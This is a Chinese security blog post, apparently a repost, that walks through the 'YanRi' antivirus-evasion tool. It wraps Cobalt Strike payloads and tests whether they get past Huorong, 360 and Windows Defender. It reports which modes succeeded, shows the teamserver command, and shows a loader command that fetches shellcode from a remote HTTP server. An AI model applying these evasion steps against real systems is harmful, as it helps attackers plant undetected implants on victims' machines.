新版掩日——免杀Windows Defender

渗透技巧 3年前 (2022) admin
1,738 0 0
✎ 阅读须知


乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。

乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!

本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!

更新时间:2022.05.16


本文首发乌鸦安全知识星球

1. 介绍

掩日免杀是一个非常优秀的项目,目前在4月19号已经更新,更新的变动较大,支持的种类更多,在这里再试试现在的效果如何:

https://github.com/1y0n/av_evasion_tool
新版掩日——免杀Windows Defender

下载之后本地打开:(记得关闭杀软)

新版掩日——免杀Windows Defender

2. 环境配置

安装环境:Windows10虚拟机 在这里新版本掩日采用了gcc环境和go环境,在作者的项目介绍中,对其都有要求,我们按照要求分别安装gccgo的环境:

gcc安装

gcc --version

新版掩日——免杀Windows Defender

go安装

go version

新版掩日——免杀Windows Defender

3. 环境

在作者的介绍中,针对Cobalt Strike生成的木马要求:

针对Cobalt Strike,不要选择生成Windows分阶段木马、Windows无阶段木马,而是生成payload,最终是一个payload.c文件。

因此在这里我们使用最常用的CS的木马来进行操作。

3.1 环境准备

在本地启动一个CS,服务端:

sudo ./teamserver 10.30.1.147 123
新版掩日——免杀Windows Defender

启用客户端,并新增监听,在这里使用作者建议的HTTPS方式:

新版掩日——免杀Windows Defender

然后生成一个payload.c文件:

新版掩日——免杀Windows Defender

3.2 测试环境

测试机:

  • • Windows10 360主动防御

  • • Windows7 火绒主动防御

  • • Windows10 开启windows Defender

其中测试的杀软均升级到最新,并且关闭了自动上传样本的功能。

4. 免杀测试

4.1 通用免杀

在这里选择直接执行的方式,并且使用隐藏窗口的模式:

新版掩日——免杀Windows Defender

此时生成成功:

新版掩日——免杀Windows Defender

4.1.1 火绒(成功)

新版掩日——免杀Windows Defender

此时没有发现问题,上线测试:

新版掩日——免杀Windows Defender

4.1.2 360(成功)

关闭360的自动上传样本功能:

新版掩日——免杀Windows Defender

然后按位置扫描,没有发现问题:

新版掩日——免杀Windows Defender

上线测试下,此时上线正常:

新版掩日——免杀Windows Defender

4.1.3 Windows Defender(失败)

此时的 Windows Defender病毒库为最新版本:

新版掩日——免杀Windows Defender

静态测试

新版掩日——免杀Windows Defender

动态上线(被杀)

在上线之后,立刻被拦截查杀:

新版掩日——免杀Windows Defender

在这里可以发现,三个杀软中只有Windows Defender难过,因此针对它进一步进行测试:

在这里选择了加密方法,然后再去生成木马,但是发现过Windows Defender的时候,依旧被杀。

新版掩日——免杀Windows Defender

4.1.4 强力模式(成功)

在这里选择强力模式,作者对于强力模式的解释是拥有很好的免杀和反沙盒效果,但是耗时比较长,而且会消耗大量的CPU

新版掩日——免杀Windows Defender
image.png
新版掩日——免杀Windows Defender

此时静态查杀,依旧正常

新版掩日——免杀Windows Defender

动态上线正常:

新版掩日——免杀Windows Defender

4.2 分离免杀

在这里执行的时候,会生成两个文件,一个是不含shellcodeshellcode加载器,另外就是一个shellcode文件(可能经过了各种加密变形)。

新版掩日——免杀Windows Defender

此时生成了两个文件:

新版掩日——免杀Windows Defender

静态查杀正常:

新版掩日——免杀Windows Defender

动态加载:
动态加载的话,不是直接双击上线的,而是在命令行中,将exe加载,并且跟上分离文件的名称才可以:(此时没有杀软)

新版掩日——免杀Windows Defender

当有Windows Defender的时候:

新版掩日——免杀Windows Defender

直接被动态查杀,再试试其他的方式,发现全部被杀

新版掩日——免杀Windows Defender

4.3 网络分离

新版掩日——免杀Windows Defender

将生成的shellcode加载器放到目标机器上,并在目标机能访问到的机器上开启一个http服务:

python3 -m http.server 802

新版掩日——免杀Windows Defender

然后在远程进行加载:

dUu.exe http://10.30.1.147:802/dUu.txt

新版掩日——免杀Windows Defender

还是被Windows Defender杀了:

新版掩日——免杀Windows Defender

5. 总结

在整个掩日免杀项目中,可以看到功能比以前增加了很多,而且体验感变好,免杀能力也很强。当然Windows Defender依旧是很难对抗的,很多情况下还是要看对方的环境是啥,不要一味地追求Bypass everyone


tips:加我wx,拉你入群,一起学习


新版掩日——免杀Windows Defender


新版掩日——免杀Windows Defender

新版掩日——免杀Windows Defender
新版掩日——免杀Windows Defender

扫取二维码获取

更多精彩

乌鸦安全

新版掩日——免杀Windows Defender



原文始发于微信公众号(乌鸦安全):新版掩日——免杀Windows Defender

版权声明:admin 发表于 2022年5月24日 下午12:05。
转载请注明:新版掩日——免杀Windows Defender | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...